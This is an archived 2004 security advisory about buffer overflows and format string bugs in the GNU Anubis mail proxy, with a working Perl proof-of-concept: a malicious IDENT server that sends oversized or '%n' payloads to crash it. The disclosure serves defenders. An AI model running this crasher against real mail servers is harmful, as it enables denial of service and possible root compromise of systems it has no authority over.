what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New


Posted Mar 5, 2004
Authored by Ulf Harnhammar

GNU Anubis is vulnerable to multiple buffer overflow attacks and format string bugs. Vulnerable versions: 3.6.2, 3.9.93, 3.9.92, 3.6.0, 3.6.1, possibly others

tags | advisory, overflow
SHA-256 | b0fe1f61d8763fc679ba6f83853b5115d77c1101fb9f753f2ba402ca8da4f1e1


Change Mirror Download
GNU Anubis buffer overflows and format string bugs

VENDOR: Free Software Foundation, Inc.
HOMEPAGE: http://www.gnu.org/software/anubis/
VULNERABLE VERSIONS: 3.6.2, 3.9.93, 3.9.92, 3.6.0, 3.6.1,
possibly others
IMMUNE VERSIONS: 3.6.2 with vendor patch, 3.9.93 with vendor patch,
latest CVS


"GNU Anubis is an outgoing mail processor. It goes between the MUA
(Mail User Agent) and the MTA (Mail Transport Agent), and can perform
various sorts of processing and conversion on-the-fly in accordance
with the sender's specified rules, based on a highly configurable
regular expressions system. It operates as a proxy server, and can
edit outgoing mail headers, encrypt or sign mail with the GnuPG,
build secure SMTP tunnels using the TLS/SSL encryption even if your
mail user agent doesn't support it, or tunnel a connection through
a SOCKS proxy server."

(quoted from freshmeat.net)


I have found two buffer overflows and three format string bugs
in GNU Anubis. They can all be remotely exploited, potentially to
get root access, as GNU Anubis usually runs as root and drops its
privileges after executing some of the vulnerable functions.


a) There are two buffer overflows in the function auth_ident()
in auth.c. The overflows are caused by sscanf() format strings of
the type "%s" instead of "%63s".

b) There are format string bugs in three instances of the syslog()
call. They are located in the function info() in log.c, the
function anubis_error() in errs.c and the function ssl_error()
in ssl.c. The vulnerable functions take strings partially made up
of user-supplied data, and use them as the format string instead
of using them as parameters ('syslog(priority, string);' instead
of 'syslog(priority, "%s", string);'). These format string bugs
become a bigger problem if you set termlevel to VERBOSE or DEBUG,
as GNU Anubis then will log more data with the syslog() facility.


The vendor has released official security patches for 3.6.2 and
3.9.93. They can be downloaded from the program's homepage. They
correct both the buffer overflows and the format string bugs.


One of the methods of attacking GNU Anubis is through IDENT data,
as it always connects to the client's IDENT server to get more
information about the client. I wrote a simple malicious IDENT
server in Perl. It crashes the current instance of GNU Anubis, either
by using the buffer overflows or by using the format string bugs.
Here it is:

#!/usr/bin/perl --

# anubis-crasher
# Ulf Harnhammar 2004
# I hereby place this program in the Public Domain.

use IO::Socket;

sub usage()
die "usage: $0 type\n".
"type is 'a' (buffer overflow) or 'b' (format string bug).\n";
} # sub usage

$port = 113;

usage() unless @ARGV == 1;
$type = shift;
usage() unless $type =~ m|^[ab]$|;

$send{'a'} = 'U' x 400;
$send{'b'} = '%n' x 28;
$sendstr = $send{$type};

$server = IO::Socket::INET->new(Proto => 'tcp',
LocalPort => $port,
Listen => SOMAXCONN,
Reuse => 1) or
die "can't create server: $!";

while ($client = $server->accept())
print "got a connection\n";

$input = <$client>;
$input =~ tr/\015\012//d;
print "client said $input\n";

# $wait = <STDIN>;
# $wait = 'be quiet, perl -wc';

$output = "a: USERID: a:$sendstr";
print $client "$output\n";
print "I said $output\n";

close $client;
print "disconnected\n";
} # while client=server->accept


* 31337 IRC KIDDIES *

K: "w0w d00d m0r3 buphph3r 0v3rphl0wzZz 4nd ph0rm4t zZztr1ngzZz!!1!
but why d0 y4 p0zZzt 4b0ut th4t xss ph1lt3r??+??+? w3 1n 'h4ck3rzZz
phr0m h3ll' r n0t 4muzZz3d!! xss 1zZzn't r34lly 4 vuln3r4b1l1ty
c0z 1t'zZz 34zZzy t0 3xpl01t th4t vuln3r4b1l1ty 4nd th3n u c4n't
pr00v3 h0w 31337 u r!!! th3 n31ghb0ur'zZz d4ught3r 1zZz r34lly
cut3 4nd 1ph 1 ph1nd l0tzZz 0ph buphph3r 0v3rphl0wzZz zZzh3'll b3
1mpr3zZzZzZ3d 4nd g0 t0 th3 m0v13zZz w1th m3 but th4t w0n't h4pp3n
1ph 1 ph1nd xss h0l3zZz!!!!11!!!1!!11!!!!"

U: "Virgin."

(Anyone on IRC who doesn't behave like K here is of course OK.)

// Ulf Harnhammar
kses - 31337 PHP HTML/XHTML filter (no XSS)

Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By